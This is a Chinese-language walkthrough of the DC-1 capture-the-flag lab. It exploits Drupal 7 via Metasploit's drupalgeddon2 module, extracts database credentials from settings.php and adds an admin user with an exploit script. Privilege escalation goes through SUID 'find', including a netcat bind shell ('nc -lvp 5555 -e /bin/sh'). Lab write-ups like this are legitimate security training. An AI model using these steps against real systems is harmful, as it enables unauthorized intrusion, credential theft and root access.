1、搭建好靶机后,由于采用的是桥接模式,前对网段快速 ping 一下,(因为试过很多次 nmap 都要等很久,不知道什么原因)。也可用 sudo arp-scan -l 查看 arp 缓存得知目的主机的 ip 地址,前提是要在桥接模式。
2、使用 nmap 进行信息收集
可知 80 端口有 drupal 搭建的网站,而且是 drupal 7
?
经过在网上的一番搜索如何入手时
都是使用 msfconsole 对 drupal 进行渗透
对 drupal 在 msfconsole 中 search 查找有没有什么可用的漏洞(也没去深入了解是什么原理)
使用 drupal_drupalgeddon2 进行入手
设置主机 set rhosts 然后 run
期间我试过很多次使用该漏洞进行渗透,每次都没有返回 session 正当我准备放弃该靶机之时。
有一次突然又行了,后来发现在渗透之前一定要 ping 一下目的主机能不能 ping 通。
不然都白搭 还受气。
先 shell
然后接出 交互式的 shell
shell
python -c 'import pty; pty.spawn("/bin/bash")'
ls 发现第一个 flag1.txt
得到提示关于 CMS 的配置文件
百度得出 drupal 的配置文件在这里的 sites/default 的 settings.php
得到 flag2 和数据库信息
进行登录数据库
继续进行挖掘信息
发现 users 表
经过百度继续探查
发现存在两种方法,一种是尝试修改 admin 的密码,一种是尝试寻找能不能添加管理员用户
方法一:
修改 admin 密码 参考如下
如何重置Drupal 7的用户密码 | 学步园
https://www.xuebuyuan.com/150214.html
得到 hash 过后的密码后去更改 admin 的密码
这时候去登录下网站试试
输入 admin admin
方法二
尝试寻找能不能添加管理员用户
searchsploit drupal 搜索有没有可用漏洞
发现 34992.py 可以添加一个管理员的用户
?添加成功 用 user 登录网站也能找到 flag3
经过寻找发现
(特殊的PERMS将帮助查找密码—但是您需要—执行该命令来了解如何获取 shadow 中的内容。)
即提示是使用 perms 来得知?passwd 和 shadow?
cat /etc/passwd
经过发现在 home 目录下还有个小 flag4?
?
结合 flag3 暗示我们要获取 root 权限查看下 root 目录下的内容
结合提示要利用 suid 来尝试获取权限
先 find 一下哪些有?root 权限的命令(以下两条命令都可以查询)
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
结合 find 命令进行提权
进入 tmp 目录下创建一文件夹
find flag4 -exec "/bin/sh"?\;
也可以 find flag4 -exec nc -lvp 5555 -e "/bin/sh"?\;
然后在 kali? nc 192.168.3.20 5555
?
参考:得知后还可以得到 flag4 用户进行 ssh (也尝试了一下用 hydra 一下 root 无果,john 也好久没出 passwd)靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权_7Riven's blog-CSDN博客1.靶机IP地址发现2.查看靶机版本和服务-sV:用来扫描目标主机和端口上运行的软件的版本-p-:扫描0-65535全部端口-sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描-Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...https://blog.csdn.net/qq_41210745/article/details/103475596
https://zhuanlan.zhihu.com/p/135342104